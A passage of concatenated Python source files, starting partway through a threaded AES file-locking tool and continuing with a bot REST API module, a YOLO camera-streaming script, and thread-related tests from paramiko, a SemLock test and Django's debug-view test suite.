Unforunately, multiprocessing.cpu_count() uses _NPROCESSORS_ONLN
which may be different than the actual number of cores available
if power saving mode is enabled.
On Linux and Mac we can use "getconf _NPROCESSORS_CONF", I have
no idea how to get it on windows, maybe some WMIC call.
'''
if os.name == 'posix':
# should be able to run getconf.
try:
out = subprocess.check_output('getconf _NPROCESSORS_CONF', stderr=subprocess.STDOUT, shell=True)
return int(out.strip())
except subprocess.CallProcessError as exc:
err('command failed: {}'.format(exc))
return multiprocessing.cpu_count()
def thread_process_file(opts, password, entry, stats):
'''
Thread worker.
Waits for the semaphore to make a slot available, then
runs the specified function.
'''
if th_abort is False:
with th_semaphore:
process_file(opts, password, entry, stats)
def wait_for_threads():
'''
Wait for threads to complete.
'''
for th in threading.enumerate():
if th == threading.currentThread():
continue
th.join()
# ================================================================
#
# Program specific functions.
#
# ================================================================
def get_err_fct(opts):
'''
Get the message function: error or warning depending on
the --warn setting.
'''
if opts.warn is True:
return warn
return err
def stat_inc(stats, key, value=1):
'''
Increment the stat in a synchronous way using a mutex
to coordinate between threads.
'''
th_mutex.acquire()
try:
stats[key] += value
finally: # avoid deadlock from exception
th_mutex.release()
def check_existence(opts, path):
'''
Check to see if a file exists.
If -o or --overwrite is specified, we don't care if it exists.
'''
if opts.overwrite is False and os.path.exists(path):
get_err_fct(opts)('file exists, cannot continue: {}'.format(path))
def read_file(opts, path, stats):
'''
Read the file contents.
'''
try:
with open(path, 'rb') as ifp:
data = ifp.read()
stat_inc(stats, 'read', len(data))
return data
except IOError as exc:
get_err_fct(opts)('failed to read file "{}": {}'.format(path, exc))
return None
def write_file(opts, path, content, stats, width=0):
'''
Write the file.
'''
try:
with open(path, 'wb') as ofp:
if width < 1:
ofp.write(content)
else:
i = 0
nl = '\n' if isinstance(content, str) else b'\n'
while i < len(content):
ofp.write(content[i:i+width] + nl)
i += width
stat_inc(stats, 'written', len(content))
except IOError as exc:
get_err_fct(opts)('failed to write file "{}": {}'.format(path, exc))
return False
return True
def lock_file(opts, password, path, stats):
'''
Lock a file.
'''
out = path + opts.suffix
infov2(opts, 'lock "{}" --> "{}"'.format(path, out))
check_existence(opts, out)
content = read_file(opts, path, stats)
if content is not None:
data = AESCipher(openssl=opts.openssl).encrypt(password, content)
if data is not None and write_file(opts, out, data, stats, width=opts.wll) is True and th_abort is False:
if out != path:
os.remove(path) # remove the input
stat_inc(stats, 'locked')
def unlock_file(opts, password, path, stats):
'''
Unlock a file.
'''
if path.endswith(opts.suffix):
if len(opts.suffix) > 0:
out = path[:-len(opts.suffix)]
else:
out = path
infov2(opts, 'unlock "{}" --> "{}"'.format(path, out))
check_existence(opts, out)
content = read_file(opts, path, stats)
if content is not None and th_abort is False:
try:
data = AESCipher(openssl=opts.openssl).decrypt(password, content)
if write_file(opts, out, data, stats) is True:
if out != path:
os.remove(path) # remove the input
stats['unlocked'] += 1
except ValueError as exc:
get_err_fct(opts)('unlock/decrypt operation failed for "{}": {}'.format(path, exc))
else:
infov2(opts, 'skip "{}"'.format(path))
stats['skipped'] += 1
def process_file(opts, password, path, stats):
'''
Process a file.
'''
if th_abort is False:
stat_inc(stats, 'files')
if opts.lock is True:
lock_file(opts, password, path, stats)
else:
unlock_file(opts, password, path, stats)
def process_dir(opts, password, path, stats):
'''
Process a directory, we always start at the top level.
'''
stats['dirs'] += 1
if opts.recurse is True:
# Recurse to get everything.
for root, subdirs, subfiles in os.walk(path):
for subfile in sorted(subfiles, key=str.lower):
if subfile.startswith('.'):
continue
if th_abort is True:
break
subpath = os.path.join(root, subfile)
th = Thread(target=thread_process_file, args=(opts, password, subpath, stats))
th.daemon = True
th.start()
else:
# Use listdir() to get the files in the current directory only.
for entry in sorted(os.listdir(path), key=str.lower):
if entry.startswith('.'):
continue
subpath = os.path.join(path, entry)
if os.path.isfile(subpath):
if th_abort is True:
break
th = Thread(target=thread_process_file, args=(opts, password, subpath, stats))
th.daemon = True
th.start()
def process(opts, password, entry, stats):
'''
Process an entry.
If it is a file, then operate on it.
If it is a directory, recurse if --recurse was specified.
'''
if th_abort is False:
if os.path.isfile(entry):
th = Thread(target=thread_process_file, args=(opts, password, entry, stats))
th.daemon = True
th.start()
elif os.path.isdir(entry):
process_dir(opts, password, entry, stats)
def run(opts, password, stats):
'''
Process the entries on the command line.
They can be either files or directories.
'''
for entry in opts.FILES:
process(opts, password, entry, stats)
def summary(opts, stats):
'''
Print the summary statistics after all threads
have completed.
'''
if opts.verbose:
action = 'lock' if opts.lock is True else 'unlock'
print('')
print('Setup')
print(' action: {:>12}'.format(action))
print(' inplace: {:>12}'.format(str(opts.inplace)))
print(' jobs: {:>12,}'.format(opts.jobs))
print(' overwrite: {:>12}'.format(str(opts.overwrite)))
print(' suffix: {:>12}'.format('"' + opts.suffix + '"'))
print('')
print('Summary')
print(' total files: {:>12,}'.format(stats['files']))
if opts.lock:
print(' total locked: {:>12,}'.format(stats['locked']))
if opts.unlock:
print(' total unlocked: {:>12,}'.format(stats['unlocked']))
print(' total skipped: {:>12,}'.format(stats['skipped']))
print(' total bytes read: {:>12,}'.format(stats['read']))
print(' total bytes written: {:>12,}'.format(stats['written']))
print('')
def get_password(opts):
'''
Get the password.
If the user specified -P or --password on the command line, use
that.
If the user speciried -p <file> or --password-file <file> on the
command line, read the first line of the file that is not blank or
starts with #.
If neither of the above, prompt the user twice.
'''
# User specified it on the command line. Not safe but useful for testing
# and for scripts.
if opts.password:
return opts.password
# User specified the password in a file. It should be 0600.
if opts.password_file:
if not os.path.exists(opts.password_file):
err("password file doesn't exist: {}".format(opts.password_file))
password = None
ifp = open(opts.password_file, 'rb')
for line in ifp.readlines():
line.strip() # leading and trailing white space not allowed
if len(line) == 0:
continue # skip blank lines
if line[0] == '#':
continue # skip comments
password = line
break
ifp.close()
if password is None:
err('password was not found in file ' + opts.password_file)
return password
# User did not specify a password, prompt twice to make sure that
# the password is specified correctly.
password = getpass.getpass('Password: ')
password2 = getpass.getpass('Re-enter password: ')
if password != password2:
err('passwords did not match!')
return password
def getopts():
'''
Get the command line options.
'''
def gettext(s):
lookup = {
'usage: ': 'USAGE:',
'positional arguments': 'POSITIONAL ARGUMENTS',
'optional arguments': 'OPTIONAL ARGUMENTS',
'show this help message and exit': 'Show this help message and exit.\n ',
}
return lookup.get(s, s)
argparse._ = gettext # to capitalize help headers
base = os.path.basename(sys.argv[0])
name = os.path.splitext(base)[0]
usage = '\n {0} [OPTIONS] [<FILES_OR_DIRS>]+'.format(base)
desc = 'DESCRIPTION:{0}'.format('\n '.join(__doc__.split('\n')))
epilog = r'''EXAMPLES:
# Example 1: help
$ {0} -h
# Example 2: lock/unlock a single file
$ {0} -P 'secret' file.txt
$ ls file.txt*
file.txt.locked
$ {0} -P 'secret' --unlock file.txt
$ ls -1 file.txt*
file.txt
# Example 3: lock/unlock a set of directories
$ {0} -P 'secret' project1 project2
$ find project1 project2 --type f -name '*.locked'
<output snipped>
$ {0} -P 'secret' --unlock project1 project2
# Example 4: lock/unlock using a custom extension
$ {0} -P 'secret' -s .EncRypt file.txt
$ ls file.txt*
file.txt.EncRypt
$ {0} -P 'secret' -s .EncRypt --unlock file.txt
# Example 5: lock/unlock a file in place (using the same name)
# The file name does not change but the content.
# It is compatible with the default mode of operation in
# previous releases.
# This mode of operation is not recommended because data
# will be lost if the disk fills up during a write.
$ {0} -P 'secret' -i -l file.txt
$ ls file.txt*
file.txt
$ {0} -P 'secret' -i -u file.txt
$ ls file.txt*
file.txt
# Example 6: use a password file.
$ echo 'secret' >pass.txt
$ chmod 0600 pass.txt
$ {0} -p pass.txt -l file.txt
$ {0} -p pass.txt -u file.txt.locked
# Example 7: encrypt and decrypt in an openssl compatible manner
# by specifying the compatibility (-c) option.
$ echo 'secret' >pass.txt
$ chmod 0600 pass.txt
$ {0} -p pass.txt -c -l file.txt
$ # Dump the locked password file contents, then decrypt it.
$ openssl enc -aes-256-cbc -d -a -salt -pass file:pass.txt -in file.txt.locked
$ {0} -p pass.txt -c -u file.txt.locked
COPYRIGHT:
Copyright (c) 2015 Joe Linoff, all rights reserved
LICENSE:
MIT Open Source
PROJECT:
https://github.com/jlinoff/lock_files
'''.format(base)
afc = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(formatter_class=afc,
description=desc[:-2],
usage=usage,
epilog=epilog)
group1 = parser.add_mutually_exclusive_group()
parser.add_argument('-c', '--openssl',
action='store_true',
help='''Enable openssl compatibility.
This will encrypt and decrypt in a manner
that is completely compatible openssl.
This option must be specified for both
encrypt and decrypt operations.
These two decrypt commands are equivalent.
$ openssl enc -aes-256-cbc -d -a -salt -pass pass:PASSWORD -in FILE -o FILE.locked
$ {0} -P PASSWORD -l FILE
These two decrypt commands are equivalent.
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:PASSWORD -in FILE.locked -o FILE
$ {0} -P PASSWORD -u FILE
'''.format(base))
parser.add_argument('-d', '--decrypt',
action='store_true',
help='''Unlock/decrypt files.
This option is deprecated.
It is the same as --unlock.
''')
parser.add_argument('-e', '--encrypt',
action='store_true',
help='''Lock/encrypt files.
This option is deprecated.
This is the same as --lock and is the default.
''')
parser.add_argument('-i', '--inplace',
action='store_true',
help='''In place mode.
Overwrite files in place.
It is the same as specifying:
-o -s ''
This is a dangerous because a disk full
operation can cause data to be lost when a
write fails. This allows you to duplicate the
behavior of the previous version.
''')
#nc = get_num_cores()
parser.add_argument('-j', '--jobs',
action='store',
type=int,
default=1,
metavar=('NUM_THREADS'),
help='''Specify the maximum number of active threads.
This can be helpful if there a lot of large
files to process where large refers to files
larger than a MB.
Default: %(default)s
''')
parser.add_argument('-l', '--lock',
action='store_true',
help='''Lock files.
Files are locked and the ".locked" extension
is appended unless the --suffix option is
specified.
''')
parser.add_argument('-o', '--overwrite',
action='store_true',
help='''Overwrite files that already exist.
This can be used in conjunction disable file
existence checks.
It is used by the --inplace mode.
''')
group1.add_argument('-p', '--password-file',
action='store',
type=str,
help='''file that contains the password.
The default behavior is to prompt for the
password.
''')
group1.add_argument('-P', '--password',
action='store',
type=str,
help='''Specify the password on the command line.
This is not secure because it is visible in
the command history.
''')
parser.add_argument('-r', '--recurse',
action='store_true',
help='''Recurse into subdirectories.
''')
parser.add_argument('-s', '--suffix',
action='store',
type=str,
default='.locked',
metavar=('EXTENSION'),
help='''Specify the extension used for locked files.
Default: %(default)s
''')
parser.add_argument('-u', '--unlock',
action='store_true',
help='''Unlock files.
Files with the ".locked" extension are
unlocked.
If the --suffix option is specified, that
extension is used instead of ".locked".
''')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='''Increase the level of verbosity.
A single -v generates a summary report.
Two or more -v options show all of the files
being processed.
''')
# Display the version number and exit.
parser.add_argument('-V', '--version',
action='version',
version='%(prog)s version {0}'.format(VERSION),
help="""Show program's version number and exit.
""")
parser.add_argument('-w', '--wll',
action='store',
type=int,
default=72,
metavar=('INTEGER'),
help='''The width of each locked/encrypted line.
This is important because text files with
very, very long can sometimes cause problems
during uploads. If set to zero, no new lines
are inserted.
Default: %(default)s
''')
parser.add_argument('-W', '--warn',
action='store_true',
help='''Warn if a single file lock/unlock fails.
Normally if the program tries to modify a
fail and that modification fails, an error is
reported and the programs stops. This option
causes that event to be treated as a warning
so the program continues.
''')
# Positional arguments at the end.
parser.add_argument('FILES',
nargs="*",
help='files to process')
opts = parser.parse_args()
# Make lock and unlock authoritative.
if opts.decrypt is True:
opts.unlock = True
if opts.encrypt is True:
opts.lock = True
if opts.lock is True and opts.unlock is True:
error('You have specified mutually exclusive options to lock/encrypt and unlock/decrypt.')
if opts.lock is False and opts.unlock is False:
opts.lock = True # the default
if opts.inplace:
opts.suffix = ''
opts.overwrite = True
elif opts.overwrite == True and opts.suffix == '':
opts.inplace = True
return opts
def main():
'''
main
'''
opts = getopts()
password = get_password(opts)
stats = {
'locked': 0,
'unlocked': 0,
'skipped': 0,
'files': 0,
'dirs': 0,
'read': 0,
'written': 0,
}
# Use the mutex for I/O to avoid interspersed output.
# Use the semaphore to limit the number of active threads.
global th_semaphore
th_semaphore = Semaphore(opts.jobs)
try:
run(opts, password, stats)
wait_for_threads()
except KeyboardInterrupt:
abort_threads()
_println('', sys.stderr)
errn('^C detected, cleaning up threads, please wait\n')
wait_for_threads()
summary(opts, stats)
if th_abort == True:
sys.exit(1)
if __name__ == '__main__':
main()
|
rest_api.py
|
# --depends-on commands
# --depends-on config
# --depends-on permissions
import binascii
import http.server
import json
import os
import socket
import threading
import urllib.parse
from src import ModuleManager, utils
from src.Logging import Logger as log
DEFAULT_PORT = 5001
DEFAULT_PUBLIC_PORT = 5000
class Response(object):
def __init__(self, compact=False):
self._compact = compact
self._headers = {}
self._data = b""
self.code = 200
self.content_type = "text/plain"
def write(self, data):
self._data += data
def write_text(self, data):
self._data += data.encode("utf8")
def write_json(self, obj):
if self._compact:
data = json.dumps(obj, separators=(",", ":"))
else:
data = json.dumps(obj, sort_keys=True, indent=4)
self._data += data.encode("utf8")
def set_header(self, key: str, value: str):
self._headers[key] = value
def get_headers(self):
headers = {}
has_content_type = False
for key, value in self._headers.items():
if key.lower() == "content-type":
has_content_type = True
headers[key] = value
if not has_content_type:
headers["Content-Type"] = self.content_type
headers["Content-Length"] = len(self._data)
return headers
def get_data(self):
return self._data
_module = None
_bot = None
_events = None
_log = None
class Handler(http.server.BaseHTTPRequestHandler):
timeout = 10
def _path_data(self):
path = urllib.parse.urlparse(self.path).path
_, _, endpoint = path[1:].partition("/")
endpoint, _, args = endpoint.partition("/")
args = list(filter(None, args.split("/")))
return path, endpoint, args
def _url_params(self):
parsed = urllib.parse.urlparse(self.path)
query = urllib.parse.parse_qs(parsed.query)
return dict([(k, v[0]) for k, v in query.items()])
def _body(self):
content_length = int(self.headers.get("content-length", 0))
return self.rfile.read(content_length)
def _respond(self, response):
self.send_response(response.code)
for key, value in response.get_headers().items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(response.get_data())
def _key_settings(self, key):
return _bot.get_setting("api-key-%s" % key, {})
def _minify_setting(self):
return _bot.get_setting("rest-api-minify", False)
def _url_for(self, headers):
return lambda route, endpoint, args=[], get_params={}: _module._url_for(
route, endpoint, args, get_params, headers.get("Host", None)
)
def _handle(self, method, path, endpoint, args):
headers = utils.CaseInsensitiveDict(dict(self.headers.items()))
params = self._url_params()
data = self._body()
response = Response(compact=self._minify_setting())
response.code = 404
hooks = _events.on("api").on(method).on(endpoint).get_hooks()
if hooks:
response.code = 200
hook = hooks[0]
authenticated = hook.get_kwarg("authenticated", True)
key = params.get("key", None)
key_setting = self._key_settings(key)
permissions = key_setting.get("permissions", [])
if key_setting:
log.debug(
"[HTTP] %s to %s with API key %s (%s)"
% (method, path, key, key_setting["comment"])
)
event_response = None
if authenticated is True or path in permissions or "*" in permissions:
event_response = (
_events.on("api")
.on(method)
.on(endpoint)
.call_for_result_unsafe(
params=params,
args=args,
data=data,
headers=headers,
response=response,
url_for=self._url_for(headers),
)
)
"""except Exception as e:
log.error("failed to call API endpoint \"%s\"" % (path))
response.code = 500"""
if event_response != None:
response.write_json(event_response)
response.content_type = "application/json"
else:
response.code = 401
return response
def _handle_wrap(self, method):
path, endpoint, args = self._path_data()
log.debug(
"[HTTP] starting _handle for %s from %s:%d: %s"
% (method, self.client_address[0], self.client_address[1], path)
)
response = _bot.trigger(
lambda: self._handle(method, path, endpoint, args))
self._respond(response)
log.debug(
"[HTTP] finishing _handle for %s from %s:%d (%d)"
% (method, self.client_address[0], self.client_address[1], response.code)
)
def do_GET(self):
self._handle_wrap("GET")
def do_POST(self):
self._handle_wrap("POST")
def log_message(self, format, *args):
return
class MagicBotIPv6HTTPd(http.server.HTTPServer):
address_family = socket.AF_INET6
@utils.export("botset", utils.BoolSetting("rest-api", "Enable/disable REST API"))
@utils.export(
"botset", utils.BoolSetting(
"rest-api-minify", "Enable/disable REST API minifying")
)
@utils.export(
"botset", utils.Setting(
"rest-api-host", "Public hostname:port for the REST API")
)
class Module(ModuleManager.BaseModule):
_name = "REST"
def on_load(self):
global _module
_module = self
global _bot
_bot = self.bot
global _events
_events = self.events
self.httpd = None
if self.bot.get_setting("rest-api", False):
self._start_httpd()
def _start_httpd(self):
port = int(self.bot.config.get("api-port", str(DEFAULT_PORT)))
self.httpd = MagicBotIPv6HTTPd(("::1", port), Handler)
self.thread = threading.Thread(target=self.httpd.serve_forever)
self.thread.daemon = True
self.thread.start()
@utils.hook("received.command.apishutdown")
def _stop_httpd(self, event):
if self.httpd:
self.httpd.shutdown()
def on_resume(self):
self._start_httpd()
def unload(self):
self._stop_httpd()
def on_pause(self):
self._stop_httpd()
@utils.hook("received.command.apikey")
@utils.kwarg("private_only", True)
@utils.spec("!'list ?<alias>wordlower")
@utils.spec("!'add !<alias>wordlower ?<endpoints>words")
@utils.spec("!'remove !<alias>wordlower")
@utils.kwarg("permission", "apikey")
def apikey(self, event):
subcommand = event["spec"][0]
alias = event["spec"][1]
found = None
api_keys = {}
for key, value in self.bot.find_settings(prefix="api-key-"):
api_keys[key] = value
if alias and value["comment"].lower() == alias:
found = key
if subcommand == "list":
aliases = {v["comment"]: v for v in api_keys.values()}
if alias:
if not alias in aliases:
event["stderr"].write("API key '%s' not found" % alias)
event["stdout"].write(
"API key %s ('%s') can access: %s"
% (key, alias, " ".join(aliases[alias]["permissions"]))
)
else:
event["stdout"].write(
"API keys: %s" % ", ".join(sorted(aliases.keys()))
)
elif subcommand == "add":
if found == None:
new_key = binascii.hexlify(os.urandom(16)).decode("ascii")
self.bot.set_setting(
"api-key-%s" % new_key,
{"comment": alias, "permissions": event["spec"][2] or []},
)
event["stdout"].write(
"New API key '%s': %s" % (alias, new_key))
else:
event["stderr"].write(
"API key alias '%s' already exists" % alias)
elif subcommand == "remove":
if not len(event["args_split"]) > 1:
raise utils.EventError("Please provide a key alias to remove")
if not found == None:
self.bot.del_setting(found)
key = found.replace("api-key-", "", 1)
event["stdout"].write(
"Deleted API key %s ('%s')" % (key, alias))
else:
event["stderr"].write("Count not find API key '%s'" % alias)
@utils.export("url-for")
def _url_for(self, route, endpoint, args=[], get_params={}, host_override=None):
host = host_override or self.bot.get_setting("rest-api-host", None)
host, _, port = host.partition(":")
if not port:
port = str(_bot.config.get("api-port", DEFAULT_PUBLIC_PORT))
host = "%s:%s" % (host, port)
if host:
args_str = ""
if args:
args_str = "/%s" % "/".join(args)
get_params_str = ""
if get_params:
get_params_str = "?%s" % urllib.parse.urlencode(get_params)
return "%s/%s/%s%s%s" % (host, route, endpoint, args_str, get_params_str)
else:
return None
|
detection_custom.py
|
# ================================================================
#
# File name : detection_custom.py
# Author : PyLessons
# Created date: 2020-09-17
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : object detection image and video example
#
# ================================================================
import os
import io
import logging
import socketserver
from threading import Condition
import threading
from http import server
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from yolov3.utils import detect_realtime, Load_Yolo_model
from yolov3.configs import *
PAGE = """\
<html>
<head>
<title>Raspberry Pi - Camera</title>
</head>
<body>
<center><h1>Raspberry Pi - Camera</h1></center>
<center><img src="stream.mjpg" width="640" height="480"></center>
</body>
</html>
"""
class StreamingOutput(object):
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
if buf.startswith(b'\xff\xd8'):
# New frame, copy the existing buffer's content and notify all
# clients it's available
self.buffer.truncate()
with self.condition:
self.frame = self.buffer.getvalue()
self.condition.notify_all()
self.buffer.seek(0)
return self.buffer.write(buf)
class StreamingHandler(server.BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
elif self.path == '/index.html':
content = PAGE.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
elif self.path == '/capture':
pass
# capture()
elif self.path == '/stream.mjpg':
self.send_response(200)
self.send_header('Age', 0)
self.send_header('Cache-Control', 'no-cache, private')
self.send_header('Pragma', 'no-cache')
self.send_header('Content-Type', 'multipart/x-mixed-replace; boundary=FRAME')
self.end_headers()
try:
while True:
with output.condition:
output.condition.wait()
frame = output.frame
self.wfile.write(b'--FRAME\r\n')
self.send_header('Content-Type', 'image/jpeg')
self.send_header('Content-Length', str(len(frame)))
self.end_headers()
self.wfile.write(frame)
self.wfile.write(b'\r\n')
except Exception as e:
logging.warning(
'Removed streaming client %s: %s',
self.client_address, str(e))
else:
self.send_error(404)
self.end_headers()
class StreamingServer(socketserver.ThreadingMixIn, server.HTTPServer):
allow_reuse_address = True
daemon_threads = True
def stream():
address = ('192.168.15.1', 8000)
s = StreamingServer(address, StreamingHandler)
s.serve_forever()
output = StreamingOutput()
threading.Thread(target=stream, daemon=True).start()
yolo = Load_Yolo_model()
detect_realtime(yolo, output=output, input_size=YOLO_INPUT_SIZE, show=False, CLASSES=TRAIN_CLASSES,
rectangle_colors=(255, 0, 0))
|
test_buffered_pipe.py
|
# Copyright (C) 2006-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Some unit tests for BufferedPipe.
"""
import threading
import time
import unittest
from paramiko.buffered_pipe import BufferedPipe, PipeTimeout
from paramiko import pipe
from paramiko.py3compat import b
def delay_thread(p):
p.feed("a")
time.sleep(0.5)
p.feed("b")
p.close()
def close_thread(p):
time.sleep(0.2)
p.close()
class BufferedPipeTest(unittest.TestCase):
def test_1_buffered_pipe(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
p.feed("hello.")
self.assertTrue(p.read_ready())
data = p.read(6)
self.assertEqual(b"hello.", data)
p.feed("plus/minus")
self.assertEqual(b"plu", p.read(3))
self.assertEqual(b"s/m", p.read(3))
self.assertEqual(b"inus", p.read(4))
p.close()
self.assertTrue(not p.read_ready())
self.assertEqual(b"", p.read(1))
def test_2_delay(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
threading.Thread(target=delay_thread, args=(p,)).start()
self.assertEqual(b"a", p.read(1, 0.1))
try:
p.read(1, 0.1)
self.assertTrue(False)
except PipeTimeout:
pass
self.assertEqual(b"b", p.read(1, 1.0))
self.assertEqual(b"", p.read(1))
def test_3_close_while_reading(self):
p = BufferedPipe()
threading.Thread(target=close_thread, args=(p,)).start()
data = p.read(1, 1.0)
self.assertEqual(b"", data)
def test_4_or_pipe(self):
p = pipe.make_pipe()
p1, p2 = pipe.make_or_pipe(p)
self.assertFalse(p._set)
p1.set()
self.assertTrue(p._set)
p2.set()
self.assertTrue(p._set)
p1.clear()
self.assertTrue(p._set)
p2.clear()
self.assertFalse(p._set)
|
test.py
|
#!/usr/bin/env python
import urllib2
from threading import Thread
URL = 'http://localhost:8001'
class SiteRequest:
def __init__(self, x=10, suffixName='', tables=[]):
self.__x = x
self.__tables = tables
self.__suffixName = suffixName
def hit(self, hitCount):
for i in range(hitCount):
for table in self.__tables:
pt = urllib2.urlopen(URL + '/' + self.__suffixName + '/' + table)
print(pt.read())
theBearArgs = (1, 'thebear', ['songHandler', 'entryHandler', 'playTimeHandler'])
gcsArgs = (1, 'gcs', ['imageHandler', 'markerHandler'])
argList = [theBearArgs, gcsArgs]
def main():
for i in argList:
th = Thread(target=lambda *args : SiteRequest(*args).hit(40000), args=i)
th.start()
if __name__ == '__main__':
main()
|
test_semlock.py
|
from _multiprocessing import SemLock
from threading import Thread
import thread
import time
def test_notify_all():
"""A low-level variation on test_notify_all() in lib-python's
test_multiprocessing.py
"""
N_THREADS = 1000
lock = SemLock(0, 1, 1)
results = []
def f(n):
if lock.acquire(timeout=5.):
results.append(n)
lock.release()
threads = [Thread(target=f, args=(i,)) for i in range(N_THREADS)]
n_started = N_THREADS
with lock:
for t in threads:
try:
t.start()
except thread.error:
# too many threads for this system
t.started = False
n_started -= 1
else:
t.started = True
time.sleep(0.1)
for t in threads:
if t.started:
t.join()
assert len(results) == n_started
|
test_debug.py
|
import importlib
import inspect
import os
import re
import sys
import tempfile
import threading
from io import StringIO
from pathlib import Path
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.shortcuts import render
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin
from django.urls import path, reverse
from django.utils.functional import SimpleLazyObject
from django.utils.safestring import mark_safe
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
cleanse_setting, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [path('url/', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(SimpleTestCase):
def test_files(self):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
with self.assertLogs('django.request', 'ERROR'):
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "Django tried these URL patterns", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
# Pattern and view name of a RegexURLPattern appear.
self.assertContains(response, r"^regex-post/(?P<pk>[0-9]+)/$", status_code=404)
self.assertContains(response, "[name='regex-post']", status_code=404)
# Pattern and view name of a RoutePattern appear.
self.assertContains(response, r"path-post/<int:pk>/", status_code=404)
self.assertContains(response, "[name='path-post']", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
Numeric IDs and fancy traceback context blocks line numbers shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises500/')
# We look for a HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
def test_template_exceptions(self):
with self.assertLogs('django.request', 'ERROR'):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]), self.assertLogs('django.request', 'ERROR'):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
